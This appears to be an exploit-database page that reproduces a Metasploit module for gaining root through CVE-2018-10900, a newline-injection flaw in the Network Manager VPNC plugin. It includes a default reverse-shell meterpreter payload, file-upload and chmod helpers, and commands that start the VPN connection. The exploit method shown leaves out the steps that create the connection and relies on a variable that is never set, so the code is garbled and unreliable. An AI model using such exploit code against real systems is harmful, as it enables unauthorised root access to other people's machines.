Exploits / Vulnerability Discovered : 2018-08-31 |
Type : local |
Platform : linux
This exploit / vulnerability Network manager vpnc 1.2.6 username local privilege escalation (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Network Manager VPNC Username Privilege Escalation',
'Description' => %q{
This module exploits an injection vulnerability in the Network Manager
VPNC plugin to gain root privileges.
This module uses a new line injection vulnerability in the configured
username for a VPN network connection to inject a `Password helper`
configuration directive into the connection configuration.
The specified helper is executed by Network Manager as root when the
connection is started.
Network Manager VPNC versions prior to 1.2.6 are vulnerable.
This module has been tested successfully with VPNC versions:
1.2.4-4 on Debian 9.0.0 (x64); and
1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Denis Andzakovic', # Discovery and exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Jul 26 2018',
'References' =>
[
['CVE', '2018-10900'],
['URL', 'http://seclists.org/oss-sec/2018/q3/51'],
['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'],
['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'],
['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'],
['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'],
['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'],
['URL', 'https://www.debian.org/security/2018/dsa-4253'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'],
['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def check
unless command_exists? 'nmcli'
vprint_error 'Network Manager nmcli utility is not installed'
return CheckCode::Safe
end
vprint_good 'nmcli utility is installed'
CheckCode::Detected
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
if check != CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
print_status 'Starting VPN connection...'
cmd_exec "nmcli connection up #{@payload_name} & echo "
end
def cleanup
print_status 'Removing VPN connection...'
res = cmd_exec "nmcli connection delete #{@payload_name}"
unless res.include? 'successfully deleted'
print_warning "Could not remove VPN connection #{@payload_name}"
end
super
end
end
Network manager vpnc 1.2.6 username local privilege escalation (metasploit)